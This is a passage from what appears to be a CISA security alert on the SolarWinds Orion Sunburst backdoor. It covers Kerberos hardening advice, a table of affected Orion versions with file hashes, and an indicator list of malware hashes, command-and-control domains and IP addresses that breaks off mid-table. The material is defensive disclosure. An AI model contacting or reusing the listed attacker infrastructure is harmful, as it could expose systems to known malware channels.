If not possible, use long and complex passwords (greater than 25 characters) for service principal accounts, and implement a good rotation policy for these passwords.</li> <li>Replace service user accounts with group Managed Service Accounts (gMSAs): <a href="https://docs.microsoft.com/en-us/windows-server/security/group-managed-service-accounts/group-managed-service-accounts-overview">https://docs.microsoft.com/en-us/windows-server/security/group-managed-service-accounts/group-managed-service-accounts-overview</a>.</li> <li>Set account options for service accounts to support <code>AES256_CTS_HMAC_SHA1_96</code> and not <code>DES</code>, <code>RC4</code>, or <code>AES128</code>.</li> <li>Define the Security Policy setting for Network Security: Configure Encryption types allowed for Kerberos. Set the allowable encryption types to <code>AES256_HMAC_SHA1</code> and Future encryption types: <a href="https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/network-security-configure-encryption-types-allowed-for-kerberos">https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/network-security-configure-encryption-types-allowed-for-kerberos</a>.</li> <li>See Microsoft’s documentation on how to reset the Kerberos Ticket Granting Ticket (krbtgt) account password twice: <a href="https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/manage/ad-forest-recovery-resetting-the-krbtgt-password">https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/manage/ad-forest-recovery-resetting-the-krbtgt-password</a>.</li> </ul> </li> </ul> </li> </ul> <p>See Joint Alert on <a href="https://us-cert.cisa.gov/ncas/alerts/aa20-245a">Technical Approaches to Uncovering and Remediating Malicious Activity</a> for more information on incident investigation and mitigation steps based on best practices.</p> <p>CISA will update this Alert, as information becomes 
available and will continue to provide technical assistance, upon request, to affected entities as they work to identify and mitigate potential compromises.</p> <h3>Contact Information</h3><p>CISA encourages recipients of this report to contribute any additional information that they may have related to this threat. For any questions related to this report, please contact CISA at</p> <ul> <li>1-888-282-0870 (From outside the United States: +1-703-235-8832)</li> <li><a href="mailto:central@cisa.dhs.gov">central@cisa.dhs.gov</a> (UNCLASS)</li> <li>us-cert@dhs.sgov.gov (SIPRNET)</li> <li>us-cert@dhs.ic.gov (JWICS)</li> </ul> <p>CISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software vulnerabilities, and phishing-related scams. Reporting forms can be found on the CISA/US-CERT homepage at <a href="http://www.us-cert.cisa.gov/">http://www.us-cert.cisa.gov/</a>.</p> <h3>Appendix A: Affected SolarWinds Orion Products</h3> <p>Table 1 identifies recent versions of the SolarWinds Orion Platform and indicates whether the Sunburst backdoor is present in each.</p> <p class="text-align-center"><em>Table 1: Affected SolarWinds Orion Products</em></p> <table border="1" cellpadding="1" cellspacing="1" class="general-table" style="width: 980.233px; height: 312px; margin-left: auto; margin-right: auto;"> <thead> <tr> <th scope="col" style="width: 108px;"><strong>Orion Platform Version</strong></th> <th scope="col" style="width: 138px;"><strong>Sunburst Backdoor Code Present</strong></th> <th scope="col" style="width: 170px;"><strong>File Version</strong></th> <th scope="col" style="width: 573px;"><strong>SHA-256</strong></th> </tr> </thead> <tbody> <tr> <td scope="col" style="text-align: left; width: 108px;">2019.4</td> <td scope="col" style="text-align: left; width: 138px;">Tampered but not backdoored</td> <td scope="col" style="text-align: left; width: 
170px;">2019.4.5200.8890</td> <td scope="col" style="text-align: left; width: 573px;">a25cadd48d70f6ea0c4a241d99c5241269e6faccb4054e62d16784640f8e53bc</td> </tr> <tr> <td scope="col" style="text-align: left; width: 108px;">2019.4 HF1</td> <td scope="col" style="text-align: left; width: 138px;">No</td> <td scope="col" style="text-align: left; width: 170px;">2019.4.5200.8950</td> <td scope="col" style="text-align: left; width: 573px;"> <p>9bee4af53a8cdd7ecabe5d0c77b6011abe887ac516a5a22ad51a058830403690</p> <p>&nbsp;</p> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 108px;">2019.4 HF2</td> <td scope="col" style="text-align: left; width: 138px;">No</td> <td scope="col" style="text-align: left; width: 170px;"> <p>2019.4.5200.8996</p> <p>&nbsp;</p> </td> <td scope="col" style="text-align: left; width: 573px;">bb86f66d11592e3312cd03423b754f7337aeebba9204f54b745ed3821de6252d</td> </tr> <tr> <td scope="col" style="text-align: left; width: 108px;">2019.4 HF3</td> <td scope="col" style="text-align: left; width: 138px;">No</td> <td scope="col" style="text-align: left; width: 170px;">2019.4.5200.9001</td> <td scope="col" style="text-align: left; width: 573px;">ae6694fd12679891d95b427444466f186bcdcc79bc0627b590e0cb40de1928ad</td> </tr> <tr> <td scope="col" style="text-align: left; width: 108px;">2019.4 HF4</td> <td scope="col" style="text-align: left; width: 138px;">No</td> <td scope="col" style="text-align: left; width: 170px;">2019.4.5200.9045</td> <td scope="col" style="text-align: left; width: 573px;"> <p>9d6285db647e7eeabdb85b409fad61467de1655098fec2e25aeb7770299e9fee</p> <p>&nbsp;</p> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 108px;">2020.2 RC1</td> <td scope="col" style="text-align: left; width: 138px;">Yes</td> <td scope="col" style="text-align: left; width: 170px;"> <p>2020.2.100.12219</p> <p>&nbsp;</p> </td> <td scope="col" style="text-align: left; width: 573px;"> 
<p>dab758bf98d9b36fa057a66cd0284737abf89857b73ca89280267ee7caf62f3b</p> <p>&nbsp;</p> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 108px;">2019.4 HF5</td> <td scope="col" style="text-align: left; width: 138px;">Yes</td> <td scope="col" style="text-align: left; width: 170px;">2019.4.5200.9083</td> <td scope="col" style="text-align: left; width: 573px;">32519b85c0b422e4656de6e6c41878e95fd95026267daab4215ee59c107d6c77</td> </tr> <tr> <td scope="col" style="text-align: left; width: 108px;">2020.2 RC2</td> <td scope="col" style="text-align: left; width: 138px;">Yes</td> <td scope="col" style="text-align: left; width: 170px;"> <p>2020.2.5200.12394</p> <p>&nbsp;</p> </td> <td scope="col" style="text-align: left; width: 573px;">019085a76ba7126fff22770d71bd901c325fc68ac55aa743327984e89f4b0134</td> </tr> <tr> <td scope="col" style="text-align: left; width: 108px;"> <p>2020.2</p> <p>2020.2 HF1</p> </td> <td scope="col" style="text-align: left; width: 138px;">Yes</td> <td scope="col" style="text-align: left; width: 170px;"> <p>2020.2.5300.12432</p> <p>&nbsp;</p> </td> <td scope="col" style="text-align: left; width: 573px;">ce77d116a074dab7a22a0fd4f2c1ab475f16eec42e1ded3c0b0aa8211fe858d6</td> </tr> <tr> <td scope="col" style="text-align: left; width: 108px;">2019.4 HF6</td> <td scope="col" style="text-align: left; width: 138px;">No</td> <td scope="col" style="text-align: left; width: 170px;">2019.4.5200.9106</td> <td scope="col" style="text-align: left; width: 573px;">8dfe613b00d495fb8905bdf6e1317d3e3ac1f63a626032fa2bdad4750887ee8a</td> </tr> <tr> <td scope="col" style="text-align: left; width: 108px;"> <p>2020.2.1</p> <p><br /> 2020.2.1 HF1</p> <p>&nbsp;</p> </td> <td scope="col" style="text-align: left; width: 138px;">No</td> <td scope="col" style="text-align: left; width: 170px;"> <p>&nbsp;&nbsp;&nbsp; 2020.2.15300.12766</p> <p>&nbsp;</p> </td> <td scope="col" style="text-align: left; width: 
573px;">143632672dcb6ef324343739636b984f5c52ece0e078cfee7c6cac4a3545403a</td> </tr> <tr> <td scope="col" style="text-align: left; width: 108px;">2020.2.1 HF2</td> <td scope="col" style="text-align: left; width: 138px;">No</td> <td scope="col" style="text-align: left; width: 170px;">2020.2.15300.12901</td> <td scope="col" style="text-align: left; width: 573px;"> <p>cc870c07eeb672ab33b6c2be51b173ad5564af5d98bfc02da02367a9e349a76f</p> </td> </tr> </tbody> </table> <h3>Appendix B: Indicators of Compromise</h3> <p>Due to the operational security posture of the adversary, most observable IOCs are of limited utility; however, they can be useful for quick triage. Below is a compilation of IOCs from a variety of public sources, provided for convenience. CISA will update this list with CISA-developed IOCs as its investigations evolve.</p> <p class="text-align-center"><em>Table 2: Indicators of Compromise</em></p> <table border="1" cellpadding="10" cellspacing="1" class="general-table" style="width: 881.46px; height: 312px; margin-right: auto; margin-left: auto;"> <thead> <tr> <th scope="col" style="width: 546px;"><strong>IOC</strong></th> <th scope="col" style="width: 52px;">Type</th> <th scope="col" style="width: 114px;">Notes</th> <th scope="col" style="width: 400px;">References</th> <th scope="col" style="width: 757px;">Source</th> </tr> </thead> <tbody> <tr> <td scope="col" style="width: 546px; text-align: left;"><strong>32519b85c0b422e4656de6e6c41878e95fd95026267daab4215ee59c107d6c77</strong></td> <td scope="col" style="width: 52px; text-align: left;">hash</td> <td scope="col" style="width: 114px; text-align: left;">Backdoor.Sunburst (2019.4 HF5 binary in Table 1)</td> <td scope="col" style="width: 400px; text-align: left;"><a href="https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/">https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/</a></td> <td scope="col" style="width: 757px; text-align: left;">&nbsp;</td> </tr> <tr> <td scope="col" style="width: 546px; text-align: left;"><strong>a25cadd48d70f6ea0c4a241d99c5241269e6faccb4054e62d16784640f8e53bc</strong></td> <td scope="col" style="width: 52px; text-align: left;">hash</td> <td scope="col" style="width: 114px; text-align: left;">Backdoor.Sunburst (2019.4 binary, listed in Table 1 as tampered but not backdoored)</td> <td scope="col" style="width: 400px; text-align: left;"><a href="https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/">https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/</a></td> <td scope="col" style="width: 757px; text-align: left;">&nbsp;</td> </tr> <tr> <td scope="col" style="width: 546px; text-align: left;"><strong>d3c6785e18fba3749fb785bc313cf8346182f532c59172b69adfb31b96a5d0af</strong></td> <td scope="col" style="width: 52px; text-align: left;">hash</td> <td scope="col" style="width: 114px; text-align: left;">Backdoor.Sunburst</td> <td scope="col" style="width: 400px; text-align: left;"><a href="https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/">https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/</a></td> <td scope="col" style="width: 757px; text-align: left;">&nbsp;</td> </tr> <tr> <td scope="col" style="width: 546px; text-align: left;"><strong>13.59.205[.]66</strong></td> <td scope="col" style="width: 52px; text-align: left;">IPv4</td> <td scope="col" style="width: 114px; text-align: left;">DEFTSECURITY[.]com</td> <td scope="col" style="width: 400px; text-align: left;"><a 
href="https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/">https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/</a></td> <td scope="col" style="width: 757px; text-align: left;">&nbsp;Volexity</td> </tr>
<tr> <td scope="col" style="width: 546px; text-align: left;"><strong>&nbsp;deftsecurity[.]com</strong></td> <td scope="col" style="width: 52px; text-align: left;">&nbsp;domain</td> <td scope="col" style="width: 114px; text-align: left;">Domain malicious on VT, registered with Amazon, hosted on US IP address 13.59.205.66, malware repository, spyware and malware</td> <td scope="col" style="width: 400px; text-align: left;"> <p><a href="https://www.virustotal.com/gui/domain/deftsecurity.com/details">https://www.virustotal.com/gui/domain/deftsecurity.com/details</a></p> <p><a href="https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/">https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/</a></p> </td> <td scope="col" style="width: 757px; text-align: left;">&nbsp;Volexity</td> </tr>
<tr> <td scope="col" style="width: 546px; text-align: left;"><strong>&nbsp;54.193.127[.]66</strong></td> <td scope="col" style="width: 52px; text-align: left;">&nbsp;IPv4</td> <td scope="col" style="width: 114px; text-align: left;">FREESCANONLINE[.]com</td> <td scope="col" style="width: 400px; text-align: left;">&nbsp;<a href="https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/">https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/</a></td> <td scope="col" style="width: 757px; text-align: left;">&nbsp;</td> </tr>
<tr> <td scope="col" style="width: 546px; text-align: left;"><strong>&nbsp;ac1b2b89e60707a20e9eb1ca480bc3410ead40643b386d624c5d21b47c02917c</strong></td> <td scope="col" style="width: 52px; text-align: left;">&nbsp;hash</td> <td scope="col" style="width: 114px; text-align: left;">No info available</td> <td scope="col" style="width: 400px; text-align: left;"><a href="https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/">https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/</a></td> <td scope="col" style="width: 757px; text-align: left;">&nbsp;</td> </tr>
<tr> <td scope="col" style="width: 546px; text-align: left;"><strong>&nbsp;c09040d35630d75dfef0f804f320f8b3d16a481071076918e9b236a321c1ea77</strong></td> <td scope="col" style="width: 52px; text-align: left;">&nbsp;hash</td> <td scope="col" style="width: 114px; text-align: left;">No info available</td> <td scope="col" style="width: 400px; text-align: left;"><a href="https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/">https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/</a></td> <td scope="col" style="width: 757px; text-align: left;">&nbsp;</td> </tr>
<tr> <td scope="col" style="width: 546px; text-align: left;"><strong>&nbsp;dab758bf98d9b36fa057a66cd0284737abf89857b73ca89280267ee7caf62f3b</strong></td> <td scope="col" style="width: 52px; text-align: left;">&nbsp;hash</td> <td scope="col" style="width: 114px; text-align: left;">No info available</td> <td scope="col" style="width: 400px; text-align: left;"><a href="https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/">https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/</a></td> <td scope="col" style="width: 757px; text-align: left;">&nbsp;</td> </tr>
<tr> <td scope="col" style="width: 546px; text-align: left;"><strong>&nbsp;eb6fab5a2964c5817fb239a7a5079cabca0a00464fb3e07155f28b0a57a2c0ed</strong></td> <td scope="col" style="width: 52px; text-align: left;">&nbsp;hash</td> <td scope="col" style="width: 114px; text-align: left;">No info available</td> <td scope="col" style="width: 400px; text-align: left;"><a href="https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/">https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/</a></td> <td scope="col" style="width: 757px; text-align: left;">&nbsp;</td> </tr>
<tr> <td scope="col" style="width: 546px; text-align: left;"><strong>&nbsp;65.153.203[.]68</strong></td> <td scope="col" style="width: 52px; text-align: left;">&nbsp;IPv4</td> <td scope="col" style="width: 114px; text-align: left;">Not seen as malicious on VT, registered in US, CenturyLink Communications, LLC</td> <td scope="col" style="width: 400px; text-align: left;"><a href="https://www.hybrid-analysis.com/sample/12e76c16bbf64e83b79d8dac921c9cccabbe40d28ad480c636f94a5737b77c9a?environmentId=100">https://www.hybrid-analysis.com/sample/12e76c16bbf64e83b79d8dac921c9cccabbe40d28ad480c636f94a5737b77c9a?environmentId=100</a></td> <td scope="col" style="width: 757px; text-align: left;">&nbsp;</td> </tr>
<tr> <td scope="col" style="width: 546px; text-align: left;"><strong>&nbsp;avsvmcloud[.]com</strong></td> <td scope="col" style="width: 52px; text-align: left;">&nbsp;domain</td> <td scope="col" style="width: 114px; text-align: left;">Reported by FireEye. The malicious DLL calls out to remote network infrastructure using the domain avsvmcloud.com to prepare possible second-stage payloads, move laterally in the organization, and compromise or exfiltrate data. Malicious on VT. Hosted on IP address 20.140.0.1, which is registered with Microsoft. Malware callhome, command and control</td> <td scope="col" style="width: 400px; text-align: left;"><a href="https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/">https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/</a></td> <td scope="col" style="width: 757px; text-align: left;"> <p><a href="https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/">https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/</a></p> <p>FireEye Report Talos</p> <p>Volexity</p> </td> </tr>
<tr> <td scope="col" style="width: 546px; text-align: left;"><strong>&nbsp;3.87.182[.]149</strong></td> <td scope="col" style="width: 52px; text-align: left;">&nbsp;IPv4</td> <td scope="col" style="width: 114px; text-align: left;">Resolves to KUBECLOUD[.]com, IP registered to Amazon. Tracked by Insikt/RF as tied to SUNBURST intrusion activity.</td> <td scope="col" style="width: 400px; text-align: left;"><a href="https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/">https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/</a></td> <td scope="col" style="width: 757px; text-align: left;">&nbsp;Volexity</td> </tr>
<tr> <td scope="col" style="width: 546px; text-align: left;"><strong>&nbsp;3.16.81[.]254</strong></td> <td scope="col" style="width: 52px; text-align: left;">&nbsp;IPv4</td> <td scope="col" style="width: 114px; text-align: left;">Resolves to SEOBUNDLEKIT[.]com, registered to Amazon. Tracked by Insikt/RF as tied to SUNBURST intrusion activity.</td> <td scope="col" style="width: 400px; text-align: left;"><a href="https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/">https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/</a></td> <td scope="col" style="width: 757px; text-align: left;">&nbsp;Volexity</td> </tr>
<tr> <td scope="col" style="width: 546px; text-align: left;"><strong>&nbsp;12.227.230[.]4</strong></td> <td scope="col" style="width: 52px; text-align: left;">&nbsp;IPv4</td> <td scope="col" style="width: 114px; text-align: left;">Seen as malicious on VT, registered in US, AT&amp;T Services, Inc</td> <td scope="col" style="width: 400px; text-align: left;"><a href="https://www.hybrid-analysis.com/sample/8d34b366f4561ca1389ce2403f918e952584a56ea55876311cfb5d2aad875439">https://www.hybrid-analysis.com/sample/8d34b366f4561ca1389ce2403f918e952584a56ea55876311cfb5d2aad875439</a></td> <td scope="col" style="width: 757px; text-align: left;">&nbsp;</td> </tr>
<tr> <td scope="col" style="width: 546px; text-align: left;"><strong>&nbsp;54.215.192[.]52</strong></td> <td scope="col" style="width: 52px; text-align: left;">&nbsp;IPv4</td> <td scope="col" style="width: 114px; text-align: left;">THEDOCCLOUD[.]com</td> <td scope="col" style="width: 400px; text-align: left;"><a href="https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/">https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/</a></td> <td scope="col" style="width: 757px; text-align: left;">&nbsp;Volexity</td> </tr>
<tr> <td scope="col" style="width: 546px; text-align: left;"><strong>&nbsp;019085a76ba7126fff22770d71bd901c325fc68ac55aa743327984e89f4b0134</strong></td> <td scope="col" style="width: 52px; text-align: left;">&nbsp;hash</td> <td scope="col" style="width: 114px; text-align: left;">Trojan.MSIL.SunBurst</td> <td scope="col" style="width: 400px; text-align: left;"><a href="https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/">https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/</a></td> <td scope="col" style="width: 757px; text-align: left;">&nbsp;</td> </tr>
<tr> <td scope="col" style="width: 546px; text-align: left;"><strong>&nbsp;ce77d116a074dab7a22a0fd4f2c1ab475f16eec42e1ded3c0b0aa8211fe858d6</strong></td> <td scope="col" style="width: 52px; text-align: left;">&nbsp;hash</td> <td scope="col" style="width: 114px; text-align: left;">Trojan.MSIL.SunBurst</td> <td scope="col" style="width: 400px; text-align: left;"><a href="https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/">https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/</a></td> <td scope="col" style="width: 757px; text-align: left;">&nbsp;</td> </tr>
<tr> <td scope="col" style="width: 546px; text-align: left;"><strong>&nbsp;8.18.144[.]11</strong></td> <td scope="col" style="width: 52px; text-align: left;">&nbsp;IPv4</td> <td scope="col" style="width: 114px; text-align: left;">&nbsp;</td> <td scope="col" style="width: 400px; text-align: left;"><a href="https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/">https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/</a></td> <td scope="col" style="width: 757px; text-align: left;">&nbsp;Volexity</td> </tr>
<tr> <td scope="col" style="width: 546px; text-align: left;"><strong>&nbsp;8.18.144[.]12</strong></td> <td scope="col" style="width: 52px; text-align: left;">&nbsp;IPv4</td> <td scope="col" style="width: 114px; text-align: left;">&nbsp;</td> <td scope="col" style="width: 400px; text-align:
left;"><a href="https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/">https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/</a></td> <td scope="col" style="width: 757px; text-align: left;">&nbsp;Volexity</td> </tr> <tr> <td scope="col" style="width: 546px; text-align: left;"><strong>&nbsp;8.18.144[.]9</strong></td> <td scope="col" style="width: 52px; text-align: left;">&nbsp;IPv4</td> <td scope="col" style="width: 114px; text-align: left;">&nbsp;</td> <td scope="col" style="width: 400px; text-align: left;"><a href="https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/">https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/</a></td> <td scope="col" style="width: 757px; text-align: left;">&nbsp;Volexity</td> </tr> <tr> <td scope="col" style="width: 546px; text-align: left;"><strong>&nbsp;8.18.144[.]20</strong></td> <td scope="col" style="width: 52px; text-align: left;">&nbsp;IPv4</td> <td scope="col" style="width: 114px; text-align: left;">&nbsp;</td> <td scope="col" style="width: 400px; text-align: left;"><a href="https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/">https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/</a></td> <td scope="col" style="width: 757px; text-align: left;">&nbsp;Volexity</td> </tr> <tr> <td scope="col" style="width: 546px; text-align: left;"><strong>&nbsp;8.18.144[.]40</strong></td> <td scope="col" style="width: 52px; text-align: left;">&nbsp;IPv4</td> <td scope="col" style="width: 114px; text-align: left;">&nbsp;</td> <td scope="col" style="width: 400px; text-align: left;"><a 
href="https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/">https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/</a></td> <td scope="col" style="width: 757px; text-align: left;">&nbsp;Volexity</td> </tr> <tr> <td scope="col" style="width: 546px; text-align: left;"><strong>&nbsp;8.18.144[.]44</strong></td> <td scope="col" style="width: 52px; text-align: left;">&nbsp;IPv4</td> <td scope="col" style="width: 114px; text-align: left;">&nbsp;</td> <td scope="col" style="width: 400px; text-align: left;"><a href="https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/">https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/</a></td> <td scope="col" style="width: 757px; text-align: left;">&nbsp;Volexity</td> </tr> <tr> <td scope="col" style="width: 546px; text-align: left;"><strong>&nbsp;8.18.144[.]62</strong></td> <td scope="col" style="width: 52px; text-align: left;">&nbsp;IPv4</td> <td scope="col" style="width: 114px; text-align: left;">&nbsp;</td> <td scope="col" style="width: 400px; text-align: left;"><a href="https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/">https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/</a></td> <td scope="col" style="width: 757px; text-align: left;">&nbsp;Volexity</td> </tr> <tr> <td scope="col" style="width: 546px; text-align: left;"><strong>&nbsp;8.18.144[.]130</strong></td> <td scope="col" style="width: 52px; text-align: left;">&nbsp;IPv4</td> <td scope="col" style="width: 114px; text-align: left;">&nbsp;</td> <td scope="col" style="width: 400px; text-align: left;"><a 
href="https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/">https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/</a></td> <td scope="col" style="width: 757px; text-align: left;">&nbsp;Volexity</td> </tr> <tr> <td scope="col" style="width: 546px; text-align: left;"><strong>&nbsp;8.18.144[.]135</strong></td> <td scope="col" style="width: 52px; text-align: left;">&nbsp;IPv4</td> <td scope="col" style="width: 114px; text-align: left;">&nbsp;</td> <td scope="col" style="width: 400px; text-align: left;"><a href="https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/">https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/</a></td> <td scope="col" style="width: 757px; text-align: left;">&nbsp;Volexity</td> </tr> <tr> <td scope="col" style="width: 546px; text-align: left;"><strong>&nbsp;8.18.144[.]136</strong></td> <td scope="col" style="width: 52px; text-align: left;">&nbsp;IPv4</td> <td scope="col" style="width: 114px; text-align: left;">&nbsp;</td> <td scope="col" style="width: 400px; text-align: left;"><a href="https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/">https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/</a></td> <td scope="col" style="width: 757px; text-align: left;">&nbsp;Volexity</td> </tr> <tr> <td scope="col" style="width: 546px; text-align: left;"><strong>&nbsp;8.18.144[.]149</strong></td> <td scope="col" style="width: 52px; text-align: left;">&nbsp;IPv4</td> <td scope="col" style="width: 114px; text-align: left;">&nbsp;</td> <td scope="col" style="width: 400px; text-align: left;"><a 
href="https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/">https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/</a></td> <td scope="col" style="width: 757px; text-align: left;">&nbsp;Volexity</td> </tr> <tr> <td scope="col" style="width: 546px; text-align: left;"><strong>&nbsp;8.18.144[.]156</strong></td> <td scope="col" style="width: 52px; text-align: left;">&nbsp;IPv4</td> <td scope="col" style="width: 114px; text-align: left;">&nbsp;</td> <td scope="col" style="width: 400px; text-align: left;"><a href="https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/">https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/</a></td> <td scope="col" style="width: 757px; text-align: left;">&nbsp;Volexity</td> </tr> <tr> <td scope="col" style="width: 546px; text-align: left;"><strong>&nbsp;8.18.144[.]158</strong></td> <td scope="col" style="width: 52px; text-align: left;">&nbsp;IPv4</td> <td scope="col" style="width: 114px; text-align: left;">&nbsp;</td> <td scope="col" style="width: 400px; text-align: left;"><a href="https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/">https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/</a></td> <td scope="col" style="width: 757px; text-align: left;">&nbsp;Volexity</td> </tr> <tr> <td scope="col" style="width: 546px; text-align: left;"><strong>&nbsp;8.18.144[.]165</strong></td> <td scope="col" style="width: 52px; text-align: left;">&nbsp;IPv4</td> <td scope="col" style="width: 114px; text-align: left;">&nbsp;</td> <td scope="col" style="width: 400px; text-align: left;"><a 
href="https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/">https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/</a></td> <td scope="col" style="width: 757px; text-align: left;">&nbsp;Volexity</td> </tr> <tr> <td scope="col" style="width: 546px; text-align: left;"><strong>&nbsp;8.18.144[.]170</strong></td> <td scope="col" style="width: 52px; text-align: left;">&nbsp;IPv4</td> <td scope="col" style="width: 114px; text-align: left;">&nbsp;</td> <td scope="col" style="width: 400px; text-align: left;"><a href="https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/">https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/</a></td> <td scope="col" style="width: 757px; text-align: left;">&nbsp;Volexity</td> </tr> <tr> <td scope="col" style="width: 546px; text-align: left;"><strong>&nbsp;8.18.144[.]180</strong></td> <td scope="col" style="width: 52px; text-align: left;">&nbsp;IPv4</td> <td scope="col" style="width: 114px; text-align: left;">&nbsp;</td> <td scope="col" style="width: 400px; text-align: left;"><a href="https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/">https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/</a></td> <td scope="col" style="width: 757px; text-align: left;">&nbsp;Volexity</td> </tr> <tr> <td scope="col" style="width: 546px; text-align: left;"><strong>&nbsp;8.18.144[.]188</strong></td> <td scope="col" style="width: 52px; text-align: left;">&nbsp;IPv4</td> <td scope="col" style="width: 114px; text-align: left;">&nbsp;</td> <td scope="col" style="width: 400px; text-align: left;"><a 
